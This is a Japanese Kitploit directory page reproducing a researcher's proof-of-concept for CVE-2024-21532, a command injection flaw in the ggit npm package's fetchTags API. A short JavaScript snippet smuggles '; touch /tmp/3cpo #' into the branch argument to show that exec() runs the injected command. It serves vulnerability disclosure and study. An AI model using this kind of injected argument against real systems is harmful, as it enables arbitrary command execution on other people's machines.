Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-21532-PoC-ggit — CVE-2024-21532 の概念実証エクスプロイト。ggit npm パッケージの fetchTags API のコマンドインジェクション脆弱性で、安全でない exec() の使用を実証します。 | Kitploit
ツール/GitHubGitHub/lirantal/cve-2024-21532-poc-ggit
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育
GitHublirantal/cve-2024-21532-poc-ggit

CVE-2024-21532-PoC-ggit

CVE-2024-21532 の概念実証エクスプロイト。ggit npm パッケージの fetchTags API のコマンドインジェクション脆弱性で、安全でない exec() の使用を実証します。

リポジトリを見る
22ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-21532 ggitにおけるコマンドインジェクションの脆弱性

ggitは自身を次のように説明しています:

root@kitploit:~
Local promise-returning git command wrappers

リソース:

  • プロジェクトのGitHubソースコード:https://github.com/bahmutov/ggit
  • プロジェクトのnpmパッケージ:https://www.npmjs.com/package/ggit

この脆弱性に関する記事:https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

悪用の背景

私はggit npmパッケージにおけるコマンドインジェクションの脆弱性を報告しています。

この脆弱性は、ライブラリのfetchTags(branch) APIに現れます。このAPIは、ユーザー入力でフェッチするブランチを指定できるようにし、その文字列をgitコマンドと連結して、安全でないNode.js子プロセスAPIであるexec()に渡します。

エクスプロイト

  1. 以前をインストール
[email protected]
  • 次のPOCを実行:
  • root@kitploit:~
    const fetchTags = require("ggit").fetchTags;
    fetchTags("; touch /tmp/3cpo #").then(function () {
      // should be same as running command
      // git pull origin --tags
      console.log("done");
    });
    
    1. ディスク上に/tmp/3cpoファイルが作成されることを確認

    コントリビューション

    このプロジェクトへのコントリビューションのガイドラインについては、CONTRIBUTINGを参照してください。

    著者

    Liran Tal

    ツールをダウンロード